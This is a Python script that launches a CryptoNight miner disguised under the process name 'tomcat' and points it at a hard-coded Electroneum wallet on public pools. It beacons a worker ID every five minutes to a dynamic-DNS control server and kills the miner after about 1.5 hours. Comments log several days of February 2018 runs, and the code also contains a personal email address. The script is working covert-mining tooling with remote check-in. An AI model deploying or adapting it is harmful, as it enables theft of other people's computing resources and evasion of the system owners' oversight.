import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:06:06.430551
#2018-02-17 16:53:03.680635
#2018-02-17 18:42:07.419048
#2018-02-17 20:32:03.797475
#2018-02-17 22:18:07.216733
#2018-02-18 00:02:07.317936
#2018-02-18 01:53:05.257807
#2018-02-18 03:41:05.831783
#2018-02-18 05:29:06.266549
#2018-02-18 07:21:01.923083
#2018-02-18 09:09:05.270647
#2018-02-18 10:55:05.406150
#2018-02-18 12:43:01.845051
#2018-02-18 14:30:05.104619
#2018-02-18 16:20:06.812849
#2018-02-18 18:09:01.297253
#2018-02-18 19:54:07.143902
#2018-02-18 21:42:01.496041
#2018-02-18 23:29:06.476463
#2018-02-19 01:16:07.266702
#2018-02-19 03:02:06.480942
#2018-02-19 04:48:06.189756
#2018-02-19 06:34:05.387273
#2018-02-19 08:23:02.211383
#2018-02-19 10:13:04.312055
#2018-02-19 12:00:10.712328
#2018-02-19 13:48:06.816464
#2018-02-19 15:38:05.998039
#2018-02-19 17:26:08.407171
#2018-02-19 19:15:09.016475
#2018-02-19 21:02:07.279564
#2018-02-19 22:50:06.236979
#2018-02-20 00:32:07.455481
#2018-02-20 02:21:08.113224
#2018-02-20 04:12:01.960362
#2018-02-20 05:55:06.575648
#2018-02-20 07:41:05.608224
#2018-02-20 09:25:09.753109
#2018-02-20 11:09:01.671629
#2018-02-20 12:55:10.036829
#2018-02-20 14:40:01.434940
#2018-02-20 16:24:02.099055
#2018-02-20 18:10:12.497439
#2018-02-20 20:03:01.247091
#2018-02-20 21:49:05.732533
#2018-02-20 23:32:06.310789
#2018-02-21 01:16:03.528655
#2018-02-21 03:05:07.101241
#2018-02-21 04:51:05.209336
#2018-02-21 06:40:09.840662
#2018-02-21 08:27:03.963702
#2018-02-21 10:12:01.407692
#2018-02-21 12:01:01.533901
#2018-02-21 13:51:08.449120
#2018-02-21 15:37:07.258483
#2018-02-21 17:29:02.214951
#2018-02-21 19:17:18.748722
#2018-02-21 21:05:03.128878
#2018-02-21 22:52:07.181134
#2018-02-22 00:40:06.997463
#2018-02-22 02:28:03.563912
#2018-02-22 04:15:08.286326
#2018-02-22 06:02:07.400147
#2018-02-22 07:47:05.762455
#2018-02-22 09:35:10.034257
#2018-02-22 11:22:07.119303
#2018-02-22 13:09:04.476429
#2018-02-22 14:59:01.522356
#2018-02-22 16:43:07.916121
#2018-02-22 18:28:11.102226
#2018-02-22 20:21:05.728097
#2018-02-22 22:07:06.630861
#2018-02-22 23:53:05.530265
#2018-02-23 01:41:01.580225
#2018-02-23 03:31:01.443016
#2018-02-23 05:15:10.131592
#2018-02-23 07:01:01.687314
#2018-02-23 08:50:02.036856
#2018-02-23 11:07:05.400256
#2018-02-23 13:00:11.981631
#2018-02-23 14:45:09.354437
#2018-02-23 16:35:09.023969
#2018-02-23 18:22:05.239758
#2018-02-23 20:08:01.736919
#2018-02-23 21:56:01.899380
#2018-02-23 23:45:01.583373
#2018-02-24 01:38:08.342949
#2018-02-24 03:27:04.302667
#2018-02-24 05:13:03.289184
#2018-02-24 07:02:01.581029
#2018-02-24 08:37:05.164786
#2018-02-24 10:08:04.993565
#2018-02-24 11:54:03.862063
#2018-02-24 13:22:01.278812
#2018-02-24 14:52:01.528119
#2018-02-24 16:27:07.348356
#2018-02-24 18:04:01.238026
#2018-02-24 19:34:05.286443
#2018-02-24 21:08:06.688259
#2018-02-24 23:17:06.299873
#2018-02-25 03:24:04.573472
#2018-02-25 07:03:07.203521